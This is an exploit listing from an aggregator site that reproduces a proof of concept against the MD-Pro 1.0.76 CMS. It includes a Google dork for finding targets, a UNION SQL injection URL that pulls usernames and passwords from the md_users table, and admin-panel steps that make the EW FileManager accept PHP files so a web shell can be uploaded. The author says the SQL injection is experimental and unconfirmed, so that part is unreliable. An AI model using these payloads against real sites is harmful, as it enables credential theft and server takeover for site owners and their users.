Exploit for MD-Pro 1.0.76 Shell Upload / SQL Injection

Name: Exploit for MD-Pro 1.0.76 Shell Upload / SQL Injection
Rating: 5 (150 reviews)
2024-10-04 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:182008
# Exploit Title: MD-Pro 1.0.76. ( SQL injection + shell upload )  
# Google Dork: intext: Powered by MD-Pro  
# Date: 2024-08-30  
# Exploit Author: Emiliano Febbi  
# Vendor Homepage: https://www.opensourcecms.com/wp-content/uploads/MDPro-website-description.png  
# Software Link: https://www.opensourcecms.com/mdpro/  
# Version: 1.0.76.  
# Tested on: Windows 10  
  
  
::: ::: ::::::::: ::::::::: ::::::::: ::::::::   
:+:+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+:   
+:+ +:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+   
+#+ +:+ +#+ +#+ +:+ +#++:++#++:++ +#++:++#+ +#++:++#: +#+ +:+   
+#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+   
#+# #+# #+# #+# #+# #+# #+# #+# #+#   
### ### ######### ### ### ### ######## #2024  
  
  
  
[code] Proof of concept for MD-Pro 1.0.76. ( SQLi + shell upload )  
-------------------------------------------------------------Part 1-------------------------------------------------------------------------------  
The SQLi that I will introduce is an experimental stuff that I am not even 100% sure!  
  
############################################################################################################################################################  
#modules.php?op=modload&name=News&file=article&sid=-1 union all select 1,pn_name,3,4,5,6,7,pn_pass,9,10,11,12,13,14,15,16,17,18,19,20,21,22 FROM md_users--#  
############################################################################################################################################################  
  
  
-------------------------------------------------------------Part 2--------------------------------------------------------------------------------  
Vulnerability present in the MD-Pro module ' EW FileManager ' inside the admin panel.  
The extensive query is: ' index.php?module=ew_filemanager&type=admin ' of the module, now you have to make changes:  
  
1# Go to this address * index.php?module=ew_filemanager&type=admin&func=modifyconfig * and change these fields in this way:  
in default's directory of users files insert ' ./ ' or ' ../ '  
  
2# Add this string in both to the modifiable extensions and to those of images ' htm,html,txt,php ' AND ' jpg,jpeg,png,bmp,gif,php ' (save all).  
  
3# Now go to File Manager (now is activated) and you can upload the shell from the basic upload form.  
  
[/code]